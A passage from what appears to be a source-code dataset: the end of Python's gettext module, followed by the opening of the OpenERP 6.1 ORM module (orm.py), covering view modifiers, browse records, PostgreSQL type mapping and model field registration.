t = copy.copy(t) if codeset: t.set_output_charset(codeset) if result is None: result = t else: result.add_fallback(t) return result def install(domain, localedir=None, codeset=None, names=None): t = translation(domain, localedir, fallback=True, codeset=codeset) t.install(names) # a mapping b/w domains and locale directories _localedirs = {} # a mapping b/w domains and codesets _localecodesets = {} # current global domain, `messages' used for compatibility w/ GNU gettext _current_domain = 'messages' def textdomain(domain=None): global _current_domain if domain is not None: _current_domain = domain return _current_domain def bindtextdomain(domain, localedir=None): global _localedirs if localedir is not None: _localedirs[domain] = localedir return _localedirs.get(domain, _default_localedir) def bind_textdomain_codeset(domain, codeset=None): global _localecodesets if codeset is not None: _localecodesets[domain] = codeset return _localecodesets.get(domain) def dgettext(domain, message): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: return message return t.gettext(message) def ldgettext(domain, message): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: return message return t.lgettext(message) def dngettext(domain, msgid1, msgid2, n): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: if n == 1: return msgid1 else: return msgid2 return t.ngettext(msgid1, msgid2, n) def ldngettext(domain, msgid1, msgid2, n): try: t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain)) except IOError: if n == 1: return msgid1 else: return msgid2 return t.lngettext(msgid1, msgid2, n) def gettext(message): return dgettext(_current_domain, message) def lgettext(message): return ldgettext(_current_domain, message) def ngettext(msgid1, msgid2, n): return 
dngettext(_current_domain, msgid1, msgid2, n) def lngettext(msgid1, msgid2, n): return ldngettext(_current_domain, msgid1, msgid2, n) # dcgettext() has been deemed unnecessary and is not implemented. # James Henstridge's Catalog constructor from GNOME gettext. Documented usage # was: # # import gettext # cat = gettext.Catalog(PACKAGE, localedir=LOCALEDIR) # _ = cat.gettext # print _('Hello World') # The resulting catalog object currently don't support access through a # dictionary API, which was supported (but apparently unused) in GNOME # gettext. Catalog = translation
apache-2.0
factorlibre/openerp-server-6.1
openerp/osv/orm.py
3
245253
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## #.apidoc title: Object Relational Mapping #.apidoc module-mods: member-order: bysource """ Object relational mapping to database (postgresql) module * Hierarchical structure * Constraints consistency, validations * Object meta Data depends on its status * Optimised processing by complex query (multiple actions at once) * Default fields value * Permissions optimisation * Persistant object: DB postgresql * Datas conversions * Multi-level caching system * 2 different inheritancies * Fields: - classicals (varchar, integer, boolean, ...) 
- relations (one2many, many2one, many2many) - functions """ import calendar import copy import datetime import itertools import logging import operator import pickle import re import simplejson import time import types from lxml import etree import fields import openerp import openerp.netsvc as netsvc import openerp.tools as tools from openerp.tools.config import config from openerp.tools.safe_eval import safe_eval as eval from openerp.tools.translate import _ from openerp import SUPERUSER_ID from query import Query _logger = logging.getLogger(__name__) _schema = logging.getLogger(__name__ + '.schema') # List of etree._Element subclasses that we choose to ignore when parsing XML. from openerp.tools import SKIPPED_ELEMENT_TYPES regex_order = re.compile('^(([a-z0-9_]+|"[a-z0-9_]+")( *desc| *asc)?( *, *|))+$', re.I) regex_object_name = re.compile(r'^[a-z0-9_.]+$') def transfer_field_to_modifiers(field, modifiers): default_values = {} state_exceptions = {} for attr in ('invisible', 'readonly', 'required'): state_exceptions[attr] = [] default_values[attr] = bool(field.get(attr)) for state, modifs in (field.get("states",{})).items(): for modif in modifs: if default_values[modif[0]] != modif[1]: state_exceptions[modif[0]].append(state) for attr, default_value in default_values.items(): if state_exceptions[attr]: modifiers[attr] = [("state", "not in" if default_value else "in", state_exceptions[attr])] else: modifiers[attr] = default_value # Don't deal with groups, it is done by check_group(). # Need the context to evaluate the invisible attribute on tree views. # For non-tree views, the context shouldn't be given. def transfer_node_to_modifiers(node, modifiers, context=None, in_tree_view=False): if node.get('attrs'): modifiers.update(eval(node.get('attrs'))) if node.get('states'): if 'invisible' in modifiers and isinstance(modifiers['invisible'], list): # TODO combine with AND or OR, use implicit AND for now. 
modifiers['invisible'].append(('state', 'not in', node.get('states').split(','))) else: modifiers['invisible'] = [('state', 'not in', node.get('states').split(','))] for a in ('invisible', 'readonly', 'required'): if node.get(a): v = bool(eval(node.get(a), {'context': context or {}})) if in_tree_view and a == 'invisible': # Invisible in a tree view has a specific meaning, make it a # new key in the modifiers attribute. modifiers['tree_invisible'] = v elif v or (a not in modifiers or not isinstance(modifiers[a], list)): # Don't set the attribute to False if a dynamic value was # provided (i.e. a domain from attrs or states). modifiers[a] = v def simplify_modifiers(modifiers): for a in ('invisible', 'readonly', 'required'): if a in modifiers and not modifiers[a]: del modifiers[a] def transfer_modifiers_to_node(modifiers, node): if modifiers: simplify_modifiers(modifiers) node.set('modifiers', simplejson.dumps(modifiers)) def setup_modifiers(node, field=None, context=None, in_tree_view=False): """ Processes node attributes and field descriptors to generate the ``modifiers`` node attribute and set it on the provided node. Alters its first argument in-place. :param node: ``field`` node from an OpenERP view :type node: lxml.etree._Element :param dict field: field descriptor corresponding to the provided node :param dict context: execution context used to evaluate node attributes :param bool in_tree_view: triggers the ``tree_invisible`` code path (separate from ``invisible``): in tree view there are two levels of invisibility, cell content (a column is present but the cell itself is not displayed) with ``invisible`` and column invisibility (the whole column is hidden) with ``tree_invisible``. 
    :returns: nothing
    """
    # Collect modifiers first from the field definition (if given), then from
    # the view node itself, and finally serialize them back onto the node.
    modifiers = {}
    if field is not None:
        transfer_field_to_modifiers(field, modifiers)
    transfer_node_to_modifiers(
        node, modifiers, context=context, in_tree_view=in_tree_view)
    transfer_modifiers_to_node(modifiers, node)


def test_modifiers(what, expected):
    # Self-test helper: `what` is either an XML snippet (string) or a
    # fields_get()-style dict; in both cases the computed modifiers must
    # serialize to exactly the JSON string `expected`.
    modifiers = {}
    if isinstance(what, basestring):
        node = etree.fromstring(what)
        transfer_node_to_modifiers(node, modifiers)
        simplify_modifiers(modifiers)
        json = simplejson.dumps(modifiers)
        assert json == expected, "%s != %s" % (json, expected)
    elif isinstance(what, dict):
        transfer_field_to_modifiers(what, modifiers)
        simplify_modifiers(modifiers)
        json = simplejson.dumps(modifiers)
        assert json == expected, "%s != %s" % (json, expected)


# To use this test:
# import openerp
# openerp.osv.orm.modifiers_tests()
def modifiers_tests():
    # Smoke tests for the node/field -> modifiers conversion above.
    test_modifiers('<field name="a"/>', '{}')
    test_modifiers('<field name="a" invisible="1"/>', '{"invisible": true}')
    test_modifiers('<field name="a" readonly="1"/>', '{"readonly": true}')
    test_modifiers('<field name="a" required="1"/>', '{"required": true}')
    test_modifiers('<field name="a" invisible="0"/>', '{}')
    test_modifiers('<field name="a" readonly="0"/>', '{}')
    test_modifiers('<field name="a" required="0"/>', '{}')
    test_modifiers('<field name="a" invisible="1" required="1"/>', '{"invisible": true, "required": true}') # TODO order is not guaranteed
    test_modifiers('<field name="a" invisible="1" required="0"/>', '{"invisible": true}')
    test_modifiers('<field name="a" invisible="0" required="1"/>', '{"required": true}')
    test_modifiers("""<field name="a" attrs="{'invisible': [('b', '=', 'c')]}"/>""", '{"invisible": [["b", "=", "c"]]}')
    # The dictionary is supposed to be the result of fields_get().
    test_modifiers({}, '{}')
    test_modifiers({"invisible": True}, '{"invisible": true}')
    test_modifiers({"invisible": False}, '{}')


def check_object_name(name):
    """ Check if the given name is a valid openerp object name.

        The _name attribute in osv and osv_memory object is subject to
        some restrictions. This function returns True or False whether
        the given name is allowed or not.

        TODO: this is an approximation. The goal in this approximation
        is to disallow uppercase characters (in some places, we quote
        table/column names and in other not, which leads to this kind
        of errors:

            psycopg2.ProgrammingError: relation "xxx" does not exist).

        The same restriction should apply to both osv and osv_memory
        objects for consistency.
    """
    if regex_object_name.match(name) is None:
        return False
    return True


def raise_on_invalid_object_name(name):
    # Hard failure: an invalid _name would later produce broken SQL
    # identifiers, so refuse to go any further.
    if not check_object_name(name):
        msg = "The _name attribute %s is not valid." % name
        _logger.error(msg)
        raise except_orm('ValueError', msg)


# Mapping from the SQL spelling of a foreign-key ON DELETE rule to the
# single-letter code PostgreSQL stores in pg_constraint.confdeltype.
POSTGRES_CONFDELTYPES = {
    'RESTRICT': 'r',
    'NO ACTION': 'a',
    'CASCADE': 'c',
    'SET NULL': 'n',
    'SET DEFAULT': 'd',
}


def intersect(la, lb):
    # Elements of `la` that also appear in `lb`, preserving `la`'s order.
    # Quadratic, but presumably only used on short lists — TODO confirm.
    return filter(lambda x: x in lb, la)


def fix_import_export_id_paths(fieldname):
    """ Fixes the id fields in import and exports, and splits field paths
    on '/'.

    :param str fieldname: name of the field to import/export
    :return: split field name
    :rtype: list of str
    """
    # 'foo.id' -> 'foo/.id' (db id) and 'foo:id' -> 'foo/id' (external id),
    # so both spellings split uniformly on '/'.
    fixed_db_id = re.sub(r'([^/])\.id', r'\1/.id', fieldname)
    fixed_external_id = re.sub(r'([^/]):id', r'\1/id', fixed_db_id)
    return fixed_external_id.split('/')


class except_orm(Exception):
    # Generic ORM-level exception carrying a (name, value) pair.
    def __init__(self, name, value):
        self.name = name
        self.value = value
        self.args = (name, value)


class BrowseRecordError(Exception):
    pass


class browse_null(object):
    """ Readonly python database object browser

    Null object returned in place of a browse_record when a relational
    field is empty: every item/attribute access yields None.
    """

    def __init__(self):
        self.id = False

    def __getitem__(self, name):
        return None

    def __getattr__(self, name):
        return None  # XXX: return self ?

    def __int__(self):
        return False

    def __str__(self):
        return ''

    def __nonzero__(self):
        return False

    def __unicode__(self):
        return u''


#
# TODO: execute an object method on browse_record_list
#
class browse_record_list(list):
    """ Collection of browse objects

        Such an instance will be returned when doing a ``browse([ids..])``
        and will be iterable, yielding browse() objects
    """

    def __init__(self, lst, context=None):
        if not context:
            context = {}
        super(browse_record_list, self).__init__(lst)
        self.context = context


class browse_record(object):
    """ An object that behaves like a row of an object's table.
        It has attributes after the columns of the corresponding object.

        Examples::

            uobj = pool.get('res.users')
            user_rec = uobj.browse(cr, uid, 104)
            name = user_rec.name
    """

    def __init__(self, cr, uid, id, table, cache, context=None,
                 list_class=browse_record_list, fields_process=None):
        """
        :param table: the browsed object (inherited from orm)
        :param dict cache: a dictionary of model->field->data to be shared
            across browse objects, thus reducing the SQL read()s. It can speed
            up things a lot, but also be disastrous if not discarded after
            write()/unlink() operations
        :param dict context: dictionary with an optional context
        """
        if fields_process is None:
            fields_process = {}
        if context is None:
            context = {}
        self._list_class = list_class
        self._cr = cr
        self._uid = uid
        self._id = id
        self._table = table # deprecated, use _model!
        self._model = table
        self._table_name = self._table._name
        self.__logger = logging.getLogger('openerp.osv.orm.browse_record.'
                                          + self._table_name)
        self._context = context
        self._fields_process = fields_process

        # Per-model slice of the shared cache; records of this model share it.
        cache.setdefault(table._name, {})
        self._data = cache[table._name]

#        if not (id and isinstance(id, (int, long,))):
#            raise BrowseRecordError(_('Wrong ID for the browse record, got %r, expected an integer.') % (id,))
#        if not table.exists(cr, uid, id, context):
#            raise BrowseRecordError(_('Object %s does not exists') % (self,))

        if id not in self._data:
            self._data[id] = {'id': id}

        self._cache = cache

    def __getitem__(self, name):
        """Lazily fetch field `name` for this record (and prefetch it for all
        sibling ids present in the cache), then return the cached value.

        Raises KeyError for unknown fields or unreadable records.
        """
        if name == 'id':
            return self._id

        if name not in self._data[self._id]:
            # build the list of fields we will fetch

            # fetch the definition of the field which was asked for
            if name in self._table._columns:
                col = self._table._columns[name]
            elif name in self._table._inherit_fields:
                col = self._table._inherit_fields[name][2]
            elif hasattr(self._table, str(name)):
                # Not a column: expose model methods (curried with cr/uid/id)
                # and plain attributes directly.
                attr = getattr(self._table, name)
                if isinstance(attr, (types.MethodType, types.LambdaType, types.FunctionType)):
                    def function_proxy(*args, **kwargs):
                        if 'context' not in kwargs and self._context:
                            kwargs.update(context=self._context)
                        return attr(self._cr, self._uid, [self._id], *args, **kwargs)
                    return function_proxy
                else:
                    return attr
            else:
                error_msg = "Field '%s' does not exist in object '%s'" % (name, self)
                self.__logger.warning(error_msg)
                raise KeyError(error_msg)

            # if the field is a classic one or a many2one, we'll fetch all classic and many2one fields
            if col._prefetch:
                # gen the list of "local" (ie not inherited) fields which are classic or many2one
                fields_to_fetch = filter(lambda x: x[1]._classic_write, self._table._columns.items())
                # gen the list of inherited fields
                inherits = map(lambda x: (x[0], x[1][2]), self._table._inherit_fields.items())
                # complete the field list with the inherited fields which are classic or many2one
                fields_to_fetch += filter(lambda x: x[1]._classic_write, inherits)
            # otherwise we fetch only that field
            else:
                fields_to_fetch = [(name, col)]
            # Prefetch for every cached id that does not have this field yet.
            ids = filter(lambda id: name not in self._data[id], self._data.keys())
            # read the results
            field_names = map(lambda x: x[0], fields_to_fetch)
            field_values = self._table.read(self._cr, self._uid, ids, field_names, context=self._context, load="_classic_write")

            # TODO: improve this, very slow for reports
            if self._fields_process:
                lang = self._context.get('lang', 'en_US') or 'en_US'
                lang_obj_ids = self.pool.get('res.lang').search(self._cr, self._uid, [('code', '=', lang)])
                if not lang_obj_ids:
                    raise Exception(_('Language with code "%s" is not defined in your system !\nDefine it through the Administration menu.') % (lang,))
                lang_obj = self.pool.get('res.lang').browse(self._cr, self._uid, lang_obj_ids[0])

                for field_name, field_column in fields_to_fetch:
                    if field_column._type in self._fields_process:
                        for result_line in field_values:
                            result_line[field_name] = self._fields_process[field_column._type](result_line[field_name])
                            if result_line[field_name]:
                                result_line[field_name].set_value(self._cr, self._uid, result_line[field_name], self, field_column, lang_obj)

            if not field_values:
                # Where did those ids come from? Perhaps old entries in ir_model_dat?
                _logger.warning("No field_values found for ids %s in %s", ids, self)
                raise KeyError('Field %s not found in %s'%(name, self))
            # create browse records for 'remote' objects
            for result_line in field_values:
                new_data = {}
                for field_name, field_column in fields_to_fetch:
                    if field_column._type in ('many2one', 'one2one'):
                        if result_line[field_name]:
                            obj = self._table.pool.get(field_column._obj)
                            if isinstance(result_line[field_name], (list, tuple)):
                                value = result_line[field_name][0]
                            else:
                                value = result_line[field_name]
                            if value:
                                # FIXME: this happen when a _inherits object
                                #        overwrite a field of it parent. Need
                                #        testing to be sure we got the right
                                #        object and not the parent one.
                                if not isinstance(value, browse_record):
                                    if obj is None:
                                        # In some cases the target model is not available yet, so we must ignore it,
                                        # which is safe in most cases, this value will just be loaded later when needed.
                                        # This situation can be caused by custom fields that connect objects with m2o without
                                        # respecting module dependencies, causing relationships to be connected to soon when
                                        # the target is not loaded yet.
                                        continue
                                    new_data[field_name] = browse_record(self._cr,
                                        self._uid, value, obj, self._cache,
                                        context=self._context,
                                        list_class=self._list_class,
                                        fields_process=self._fields_process)
                                else:
                                    new_data[field_name] = value
                            else:
                                new_data[field_name] = browse_null()
                        else:
                            new_data[field_name] = browse_null()
                    elif field_column._type in ('one2many', 'many2many') and len(result_line[field_name]):
                        new_data[field_name] = self._list_class([browse_record(self._cr, self._uid, id, self._table.pool.get(field_column._obj), self._cache, context=self._context, list_class=self._list_class, fields_process=self._fields_process) for id in result_line[field_name]], self._context)
                    elif field_column._type in ('reference'):
                        # NOTE(review): ('reference') is a plain string, not a
                        # 1-tuple; `in` is substring match here. It still only
                        # matches the exact _type 'reference' in practice.
                        if result_line[field_name]:
                            if isinstance(result_line[field_name], browse_record):
                                new_data[field_name] = result_line[field_name]
                            else:
                                # Reference values are stored as 'model,id'.
                                ref_obj, ref_id = result_line[field_name].split(',')
                                ref_id = long(ref_id)
                                if ref_id:
                                    obj = self._table.pool.get(ref_obj)
                                    new_data[field_name] = browse_record(self._cr, self._uid, ref_id, obj, self._cache, context=self._context, list_class=self._list_class, fields_process=self._fields_process)
                                else:
                                    new_data[field_name] = browse_null()
                        else:
                            new_data[field_name] = browse_null()
                    else:
                        new_data[field_name] = result_line[field_name]
                self._data[result_line['id']].update(new_data)

            if not name in self._data[self._id]:
                # How did this happen? Could be a missing model due to custom fields used too soon, see above.
                self.__logger.error("Fields to fetch: %s, Field values: %s", field_names, field_values)
                self.__logger.error("Cached: %s, Table: %s", self._data[self._id], self._table)
                raise KeyError(_('Unknown attribute %s in %s ') % (name, self))
        return self._data[self._id][name]

    def __getattr__(self, name):
        # Attribute access delegates to __getitem__; unknown fields become
        # AttributeError so hasattr() behaves as expected.
        try:
            return self[name]
        except KeyError, e:
            raise AttributeError(e)

    def __contains__(self, name):
        return (name in self._table._columns) or (name in self._table._inherit_fields) or hasattr(self._table, name)

    def __iter__(self):
        raise NotImplementedError("Iteration is not allowed on %s" % self)

    def __hasattr__(self, name):
        return name in self

    def __int__(self):
        return self._id

    def __str__(self):
        return "browse_record(%s, %d)" % (self._table_name, self._id)

    def __eq__(self, other):
        # Records compare equal when they reference the same (model, id).
        if not isinstance(other, browse_record):
            return False
        return (self._table_name, self._id) == (other._table_name, other._id)

    def __ne__(self, other):
        if not isinstance(other, browse_record):
            return True
        return (self._table_name, self._id) != (other._table_name, other._id)

    # we need to define __unicode__ even though we've already defined __str__
    # because we have overridden __getattr__
    def __unicode__(self):
        return unicode(str(self))

    def __hash__(self):
        return hash((self._table_name, self._id))

    __repr__ = __str__

    def refresh(self):
        """Force refreshing this browse_record's data and all the data of the
           records that belong to the same cache, by emptying the cache completely,
           preserving only the record identifiers (for prefetching optimizations).
        """
        for model, model_cache in self._cache.iteritems():
            # only preserve the ids of the records that were in the cache
            cached_ids = dict([(i, {'id': i}) for i in model_cache.keys()])
            self._cache[model].clear()
            self._cache[model].update(cached_ids)


def pg_varchar(size=0):
    """ Returns the VARCHAR declaration for the provided size:

    * If no size (or an empty or negative size is provided) return an
      'infinite' VARCHAR
    * Otherwise return a VARCHAR(n)

    :type int size: varchar size, optional
    :rtype: str
    """
    if size:
        if not isinstance(size, int):
            raise TypeError("VARCHAR parameter should be an int, got %s" % type(size))
        if size > 0:
            return 'VARCHAR(%d)' % size
    return 'VARCHAR'


# Direct field-class -> PostgreSQL type name mapping; types needing logic
# (float, char, selection, function, ...) are handled in get_pg_type().
FIELDS_TO_PGTYPES = {
    fields.boolean: 'bool',
    fields.integer: 'int4',
    fields.integer_big: 'int8',
    fields.text: 'text',
    fields.date: 'date',
    fields.time: 'time',
    fields.datetime: 'timestamp',
    fields.binary: 'bytea',
    fields.many2one: 'int4',
    fields.serialized: 'text',
}


def get_pg_type(f, type_override=None):
    """
    :param fields._column f: field to get a Postgres type for
    :param type type_override: use the provided type for dispatching instead of
        the field's own type
    :returns: (postgres_identification_type, postgres_type_specification)
    :rtype: (str, str)
    """
    field_type = type_override or type(f)

    if field_type in FIELDS_TO_PGTYPES:
        pg_type = (FIELDS_TO_PGTYPES[field_type], FIELDS_TO_PGTYPES[field_type])
    elif issubclass(field_type, fields.float):
        if f.digits:
            pg_type = ('numeric', 'NUMERIC')
        else:
            pg_type = ('float8', 'DOUBLE PRECISION')
    elif issubclass(field_type, (fields.char, fields.reference)):
        pg_type = ('varchar', pg_varchar(f.size))
    elif issubclass(field_type, fields.selection):
        # Integer-keyed selections (or explicit size == -1) are stored as int.
        if (isinstance(f.selection, list) and isinstance(f.selection[0][0], int))\
                or getattr(f, 'size', None) == -1:
            pg_type = ('int4', 'INTEGER')
        else:
            pg_type = ('varchar', pg_varchar(getattr(f, 'size', None)))
    elif issubclass(field_type, fields.function):
        # Function fields dispatch on the type they emulate.
        if f._type == 'selection':
            pg_type = ('varchar', pg_varchar())
        else:
            pg_type = get_pg_type(f, getattr(fields, f._type))
    else:
        _logger.warning('%s type not supported!', field_type)
        pg_type = None

    return pg_type


class MetaModel(type):
    """ Metaclass for the Model.

    This class is used as the metaclass for the Model class to discover
    the models defined in a module (i.e. without instanciating them).
    If the automatic discovery is not needed, it is possible to set the
    model's _register attribute to False.
    """

    module_to_models = {}

    def __init__(self, name, bases, attrs):
        if not self._register:
            self._register = True
            super(MetaModel, self).__init__(name, bases, attrs)
            return

        # The (OpenERP) module name can be in the `openerp.addons` namespace
        # or not. For instance module `sale` can be imported as
        # `openerp.addons.sale` (the good way) or `sale` (for backward
        # compatibility).
        module_parts = self.__module__.split('.')
        if len(module_parts) > 2 and module_parts[0] == 'openerp' and \
                module_parts[1] == 'addons':
            module_name = self.__module__.split('.')[2]
        else:
            module_name = self.__module__.split('.')[0]

        if not hasattr(self, '_module'):
            self._module = module_name

        # Remember which models to instanciate for this module.
        self.module_to_models.setdefault(self._module, []).append(self)


# Definition of log access columns, automatically added to models if
# self._log_access is True
LOG_ACCESS_COLUMNS = {
    'create_uid': 'INTEGER REFERENCES res_users ON DELETE SET NULL',
    'create_date': 'TIMESTAMP',
    'write_uid': 'INTEGER REFERENCES res_users ON DELETE SET NULL',
    'write_date': 'TIMESTAMP'
}
# special columns automatically created by the ORM
MAGIC_COLUMNS = ['id'] + LOG_ACCESS_COLUMNS.keys()


class BaseModel(object):
    """ Base class for OpenERP models.

    OpenERP models are created by inheriting from this class' subclasses:

        * Model: for regular database-persisted models
        * TransientModel: for temporary data, stored in the database but automatically
          vaccuumed every so often
        * AbstractModel: for abstract super classes meant to be shared by multiple
          _inheriting classes (usually Models or TransientModels)

    The system will later instantiate the class once per database (on
    which the class' module is installed).

    To create a class that should not be instantiated, the _register class attribute
    may be set to False.
    """
    __metaclass__ = MetaModel
    _register = False # Set to false if the model shouldn't be automatically discovered.
    _name = None
    _columns = {}
    _constraints = []
    _defaults = {}
    _rec_name = 'name'
    _parent_name = 'parent_id'
    _parent_store = False
    _parent_order = False
    _date_name = 'date'
    _order = 'id'
    _sequence = None
    _description = None

    # dict of {field:method}, with method returning the name_get of records
    # to include in the _read_group, if grouped on this field
    _group_by_full = {}

    # Transience
    _transient = False # True in a TransientModel
    _transient_max_count = None
    _transient_max_hours = None
    _transient_check_time = 20

    # structure:
    #  { 'parent_model': 'm2o_field', ... }
    _inherits = {}

    # Mapping from inherits'd field name to triple (m, r, f, n) where m is the
    # model from which it is inherits'd, r is the (local) field towards m, f
    # is the _column object itself, and n is the original (i.e. top-most)
    # parent model.
    # Example:
    #  { 'field_name': ('parent_model', 'm2o_field_to_reach_parent',
    #                   field_column_obj, origina_parent_model), ... }
    _inherit_fields = {}

    # Mapping field name/column_info object
    # This is similar to _inherit_fields but:
    # 1. includes self fields,
    # 2. uses column_info instead of a triple.
    _all_columns = {}

    _table = None
    _invalids = set()
    _log_create = False
    _sql_constraints = []
    _protected = ['read', 'write', 'create', 'default_get', 'perm_read', 'unlink', 'fields_get', 'fields_view_get', 'search', 'name_get', 'distinct_field_get', 'name_search', 'copy', 'import_data', 'search_count', 'exists']

    CONCURRENCY_CHECK_FIELD = '__last_update'

    def log(self, cr, uid, id, message, secondary=False, context=None):
        # Record a message in res.log for record `id`, unless the caller
        # disabled logging through the context.
        if context and context.get('disable_log'):
            return True
        return self.pool.get('res.log').create(cr, uid,
                {
                    'name': message,
                    'res_model': self._name,
                    'secondary': secondary,
                    'res_id': id,
                },
                context=context
        )

    def view_init(self, cr, uid, fields_list, context=None):
        """Override this method to do specific things when a view on the object is opened."""
        pass

    def _field_create(self, cr, context=None):
        """ Create entries in ir_model_fields for all the model's fields.

        If necessary, also create an entry in ir_model, and if called from the
        modules loading scheme (by receiving 'module' in the context), also
        create entries in ir_model_data (for the model and the fields).

        - create an entry in ir_model (if there is not already one),
        - create an entry in ir_model_data (if there is not already one, and if
          'module' is in the context),
        - update ir_model_fields with the fields found in _columns
          (TODO there is some redundancy as _columns is updated from
          ir_model_fields in __init__).
        """
        if context is None:
            context = {}
        # Ensure the ir_model row for this model exists.
        cr.execute("SELECT id FROM ir_model WHERE model=%s", (self._name,))
        if not cr.rowcount:
            cr.execute('SELECT nextval(%s)', ('ir_model_id_seq',))
            model_id = cr.fetchone()[0]
            cr.execute("INSERT INTO ir_model (id,model, name, info,state) VALUES (%s, %s, %s, %s, %s)", (model_id, self._name, self._description, self.__doc__, 'base'))
        else:
            model_id = cr.fetchone()[0]
        if 'module' in context:
            # Register the model's xml id (module.model_<name>) if missing.
            name_id = 'model_'+self._name.replace('.', '_')
            cr.execute('select * from ir_model_data where name=%s and module=%s', (name_id, context['module']))
            if not cr.rowcount:
                cr.execute("INSERT INTO ir_model_data (name,date_init,date_update,module,model,res_id) VALUES (%s, (now() at time zone 'UTC'), (now() at time zone 'UTC'), %s, %s, %s)", \
                    (name_id, context['module'], 'ir.model', model_id)
                )

        cr.commit()

        cr.execute("SELECT * FROM ir_model_fields WHERE model=%s", (self._name,))
        cols = {}
        for rec in cr.dictfetchall():
            cols[rec['name']] = rec

        ir_model_fields_obj = self.pool.get('ir.model.fields')

        # sparse field should be created at the end, as it depends on its serialized field already existing
        model_fields = sorted(self._columns.items(), key=lambda x: 1 if x[1]._type == 'sparse' else 0)
        for (k, f) in model_fields:
            vals = {
                'model_id': model_id,
                'model': self._name,
                'name': k,
                'field_description': f.string.replace("'", " "),
                'ttype': f._type,
                'relation': f._obj or '',
                'view_load': (f.view_load and 1) or 0,
                'select_level': tools.ustr(f.select or 0),
                'readonly': (f.readonly and 1) or 0,
                'required': (f.required and 1) or 0,
                'selectable': (f.selectable and 1) or 0,
                'translate': (f.translate and 1) or 0,
                'relation_field': (f._type=='one2many' and isinstance(f, fields.one2many)) and f._fields_id or '',
                'serialization_field_id': None,
            }
            if getattr(f, 'serialization_field', None):
                # resolve link to serialization_field if specified by name
                serialization_field_id = ir_model_fields_obj.search(cr, 1, [('model','=',vals['model']), ('name', '=', f.serialization_field)])
                if not serialization_field_id:
                    raise except_orm(_('Error'), _("Serialization field `%s` not found for sparse field `%s`!") % (f.serialization_field, k))
                vals['serialization_field_id'] = serialization_field_id[0]

            # When its a custom field,it does not contain f.select
            if context.get('field_state', 'base') == 'manual':
                if context.get('field_name', '') == k:
                    vals['select_level'] = context.get('select', '0')
                #setting value to let the problem NOT occur next time
                elif k in cols:
                    vals['select_level'] = cols[k]['select_level']

            if k not in cols:
                # New field: insert it, and register its xml id when loading
                # from a module.
                cr.execute('select nextval(%s)', ('ir_model_fields_id_seq',))
                id = cr.fetchone()[0]
                vals['id'] = id
                cr.execute("""INSERT INTO ir_model_fields (
                    id, model_id, model, name, field_description, ttype,
                    relation,view_load,state,select_level,relation_field, translate, serialization_field_id
                ) VALUES (
                    %s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s
                )""", (
                    id, vals['model_id'], vals['model'], vals['name'], vals['field_description'], vals['ttype'],
                    vals['relation'], bool(vals['view_load']), 'base',
                    vals['select_level'], vals['relation_field'], bool(vals['translate']), vals['serialization_field_id']
                ))
                if 'module' in context:
                    name1 = 'field_' + self._table + '_' + k
                    cr.execute("select name from ir_model_data where name=%s", (name1,))
                    if cr.fetchone():
                        name1 = name1 + "_" + str(id)
                    cr.execute("INSERT INTO ir_model_data (name,date_init,date_update,module,model,res_id) VALUES (%s, (now() at time zone 'UTC'), (now() at time zone 'UTC'), %s, %s, %s)", \
                        (name1, context['module'], 'ir.model.fields', id)
                    )
            else:
                # Existing field: update the row as soon as any value differs.
                for key, val in vals.items():
                    if cols[k][key] != vals[key]:
                        cr.execute('update ir_model_fields set field_description=%s where model=%s and name=%s', (vals['field_description'], vals['model'], vals['name']))
                        cr.commit()
                        cr.execute("""UPDATE ir_model_fields SET
                            model_id=%s, field_description=%s, ttype=%s, relation=%s,
                            view_load=%s, select_level=%s, readonly=%s ,required=%s, selectable=%s, relation_field=%s, translate=%s, serialization_field_id=%s
                        WHERE
                            model=%s AND name=%s""", (
                                vals['model_id'], vals['field_description'], vals['ttype'],
                                vals['relation'], bool(vals['view_load']),
                                vals['select_level'], bool(vals['readonly']), bool(vals['required']), bool(vals['selectable']), vals['relation_field'], bool(vals['translate']), vals['serialization_field_id'], vals['model'], vals['name']
                            ))
                        break
        cr.commit()

    #
    # Goal: try to apply inheritance at the instanciation level and
    #       put objects in the pool var
    #
    @classmethod
    def create_instance(cls, pool, cr):
        """ Instanciate a given model.

        This class method instanciates the class of some model (i.e. a class
        deriving from osv or osv_memory). The class might be the class passed
        in argument or, if it inherits from another class, a class constructed
        by combining the two classes.

        The ``attributes`` argument specifies which parent class attributes
        have to be combined.

        TODO: the creation of the combined class is repeated at each call of
        this method. This is probably unnecessary.
        """
        attributes = ['_columns', '_defaults', '_inherits', '_constraints',
            '_sql_constraints']

        parent_names = getattr(cls, '_inherit', None)
        if parent_names:
            if isinstance(parent_names, (str, unicode)):
                name = cls._name or parent_names
                parent_names = [parent_names]
            else:
                name = cls._name
            if not name:
                raise TypeError('_name is mandatory in case of multiple inheritance')

            for parent_name in ((type(parent_names)==list) and parent_names or [parent_names]):
                parent_model = pool.get(parent_name)
                if not parent_model:
                    raise TypeError('The model "%s" specifies an unexisting parent class "%s"\n'
                        'You may need to add a dependency on the parent class\' module.' % (name, parent_name))
                if not getattr(cls, '_original_module', None) and name == parent_model._name:
                    cls._original_module = parent_model._original_module
                parent_class = parent_model.__class__
                nattr = {}
                for s in attributes:
                    new = copy.copy(getattr(parent_model, s, {}))
                    if s == '_columns':
                        # Don't _inherit custom fields.
                        for c in new.keys():
                            if new[c].manual:
                                del new[c]
                        # Duplicate float fields because they have a .digits
                        # cache (which must be per-registry, not server-wide).
                        for c in new.keys():
                            if new[c]._type == 'float':
                                new[c] = copy.copy(new[c])
                    if hasattr(new, 'update'):
                        # dict-like attributes: child values override parent's.
                        new.update(cls.__dict__.get(s, {}))
                    elif s=='_constraints':
